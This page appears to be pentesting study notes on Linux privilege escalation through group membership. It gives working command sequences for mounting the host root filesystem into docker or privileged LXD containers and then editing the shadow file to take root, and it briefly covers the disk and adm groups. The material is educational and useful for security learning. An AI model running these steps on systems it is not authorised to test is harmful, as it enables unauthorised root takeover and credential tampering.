search
TwitterGithubLinkedinInstagramDiscord
githubEdit

Group Based

hashtag
Docker

If we are member of docker group we can escalate our privilege to root.

The idea is, we are going to take / directory of host machine and mount it to our container. Once the directory is mounted, we will have root inside of our container and we can manipulate any files on this host file system through the container.

  • docker run -v /:/mnt -it alpine

    mount / from hot machine to /mnt with -it interactive terminal. using alpine image

When victim doesnot have internet, it cannot pull the alpine image, so

  • docker pull alpine β†’ pull alpine in attacker machine

  • docker save -o alpine.tar alpine β†’ save alpine image to tar file and transfer to victim

  • docker load -i /path/to/destination/alpine.tar β†’ load image from tar file

then we are done

  • docker image ls β†’ shows the images.

Watch this excellent video by Condahttps://youtu.be/pRBj2dm4CDU?list=PLDrNMcTNhhYrBNZ_FdtMq-gLFQeUZFzWVarrow-up-right

hashtag
LXC / LXD

Idea is the same as docker.

  • First we will download Alpine Image in our machine and transfer it to victim

    A minimal Docker image based on Alpine Linux with a complete package index and only 5 MB in size!

  • lxd init to initialize linux container daemon

unzip the Alpine.zip

  • lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpineβ†’ import local image.

  • lxc image list β†’ to list out the images

  • lxc init alpine dollarboysushil -c security.privileged=true β†’ Start a privileged container with the security.privileged set to true to run the container without a UID mapping, making the root user in the container the same as the root user on the host. here alpine is the name of the image and dollarboysushil is the name of the container we are going to spawn

  • lxc config device add dollarboysushil mydev disk source=/ path=/mnt/root recursive=true β†’ Mount the host file system.

    we are mounting entire file system / of the host to path /mnt/root

    recursive=true to get all the files and folders.

  • lxc start dollarboysushilβ†’ starting the container. we can use lxc list to view the status

  • lxc exec dollarboysushil /bin/sh β†’ execute a command inside of our container

Now we are root on the container and container contains the whole file system of host. we can edit the /mnt/etc/shadowto remove / change password of root, so that we can login as root in host.

Watch this excellent video by Conda https://youtu.be/7x4gwV632o0?list=PLDrNMcTNhhYrBNZ_FdtMq-gLFQeUZFzWVarrow-up-right

hashtag
DISK

User of disk group has full access within /dev such as /dev/sda

hashtag
ADM

Members of the adm group are able to read all logs stored in /var/log.

PreviousCapabilitiesNextSUID Privilege Escalation

Last updated